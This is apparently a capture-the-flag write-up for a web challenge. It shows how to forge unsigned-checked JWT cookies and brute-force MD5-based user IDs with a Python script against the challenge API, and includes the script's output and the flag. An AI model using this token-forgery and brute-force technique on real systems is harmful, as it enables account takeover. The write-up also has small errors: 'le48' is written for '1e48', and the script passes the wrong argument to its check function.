# Baking Cookies

## Question

Sorry to bother you, but it seems I forgot my credentials. Would it be possible for you to do us a favor and privilege escalate into my account. It's the only way to avoid system down time. Be sure to check out the authentication code, I'm sure it will be helpful.

## Hint

broken_jwt_token seems vulnerable to some trivial JWT attacks. But the authentication itself seems a little bit weird.

## Solution

First, taking a look at the main screen:

![denied](images/baking_cookies_denied.png)

Gives us a Username `1639001129544185` and password `28938520400829` but is not the correct one to escalate privileges. There are two buttons: [Server Side Code](file/server.html) and [Client Side Code](file/client.html).

The interesting part of the server code is below:

```javascript
 if (user.userid > 0) {
            MD5Hash = (new MD5().update((user.userid).toString())).digest('hex').substr(0, 4)
            hashValid = (Number(MD5Hash).toString().length > 8)
            // Privileged user has access to the system.
            if (hashValid) {
                payload = `ssh internal.workshop.tld
                            220 vsSSHd 3.0.2+ (ext,1) ready...
                            User (internal.workshop.tld:(none)): <b>${user.firstName}.${user.lastName}</b> with <b>ADMIN APPROVAL.</b>
                            331 Please specify the password.
                            Password: <b>${user.password}</b> 
                            230 OK. Current restricted directory is /.
                            230 OK. MOTD os{${flag}} 
                            >> [no input]
                            Connection closed by host.
                `
                res.json({ status: "ReadData", data: user, log: payload })
            }else{
                payload = `ssh internal.workshop.tld
                            220 vsSSHd 3.0.2+ (ext,1) ready...
                            User (internal.workshop.tld:(none)): <b>${user.firstName}.${user.lastName}</b>
                            331 Please specify the password.
                            Password: <b>${user.password}</b>
                            230 OK. Current restricted directory is /chroot/jail.
                            !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                            !! USER IS NOT AUTHORIZED FOR REMOTE LOGIN !! 
                            !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                            exit.
                `
                res.json({ status: "ReadData", data: user, log: payload })
            }
        }
```

There are two lines of code for the authentication we need to worry about:

1) `MD5Hash = (new MD5().update((user.userid).toString())).digest('hex').substr(0, 4)`

   This line creates a MD5 (partial) checksum of the user name.

2) `hashValid = (Number(MD5Hash).toString().length > 8)`

   This check the hashed value as a number to see if the number is greater then 8 digits and the user id on the page is 16 characters.

   For example, if you have a MD5 such as `le48____________________________` and we only care about the first 4 characters (`le48`). `1e48` is `1000000000000000043845843045076197354634047651840`. You are going to ignore the rest of the MD5.

    If you open `Web Development Tools` with `CTRL + SHIFT + I`, check the cookies by:

    1) Click on the **Application** tab
    2) Click on the **broken_jwt_token**
    3) If you decode the token, you get the following:

    ![jwt](images/baking_cookies_jwt.png)

    * red: JWT image
    * yellow: user data
    * green: JWT sign

    The user data is as follows:

    ```python
    {
        "userid":"1639010907931705",
        "password":"276295583408997",
        "firstName":"Erevan",
        "lastName":"Sariel",
        "iat":1639010907
    }
    ```

Since we need to brute force the userid, we can basically use this user object for our script. The script is below. You need to install [PyJWT](https://pyjwt.readthedocs.io/en/stable/#) before running it.

```python
import hashlib
import math
import requests
import jwt

# Setups the user object. Set the user id to '0'. 
user = {
    "userid": 0,
    "password": "276295583408997",
    "firstName": "Erevan",
    "lastName": "Sariel",
    "iat": 1639010907,
}

# API Endpoint
url = "https://ctf.opensecurity.io/api/check"

# Sets our headers
headers = {
    "User-Agent": "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0",
    "Content-Type": "application/json",
}


def checkUserID(userid):
    '''
    Test the user id against an algorithm similar to the showing in the
    server code. Returns True if one is found otherwise false.
    '''
    try:
        md5 = hashlib.md5(str(userid).encode()).hexdigest()
        md5_num = math.floor(float(md5[:4]))
        return len(str(md5_num)) > 8
    except ValueError:
        return False


def createCookie(userobj):
    '''
    Creates a basic JWT cookie. 'Secret' can be anything because
    the server is NOT checking.
    '''
    return jwt.encode(userobj, "pumkincookies", algorithm="HS256")


userid = 1

# Loop until we find one
while True:
    userid += 1
    user["userid"] = userid

    if checkUserID(user):
        print(f"[+] checking userid .... {userid}")
        print("[+]\tpossible usable userid ... checking api")
        cookies = {"broken_jwt_token": createCookie(user)}

        # Send request to check the API for a correct user id
        req = requests.get(url, headers=headers, cookies=cookies)
        req_json = req.json()
        if req_json["log"].find("NOT AUTHORIZED") == -1:
            # if authorized, printout the log
            print(req_json["log"])
            break
        print("[+]\tchecked failed! continuing...")

```

Running the script takes a while (about 3 to 5 mins).

```bash
[+] possible usable userid ... checking api
[+] checked failed! continuing...
[+] checking userid .... 7300
[+]     possible usable userid ... checking api
[+]     checked failed! continuing...
[+] checking userid .... 7426
[+]     possible usable userid ... checking api
[+]     checked failed! continuing...
[+] checking userid .... 7501
[+]     possible usable userid ... checking api
ssh internal.workshop.tld
220 vsSSHd 3.0.2+ (ext,1) ready...
User (internal.workshop.tld:(none)): <b>Andraste.Lia</b> with <b>ADMIN APPROVAL.</b>
331 Please specify the password.
Password: <b>28938520400829</b> 
230 OK. Current restricted directory is /.
230 OK. MOTD <strong>os{MD5_1z_br0k3n_}</strong>
>> [no input]
Connection closed by host.
```

The first user id to match is `7501`.

flag: os{MD5_1z_br0k3n_}
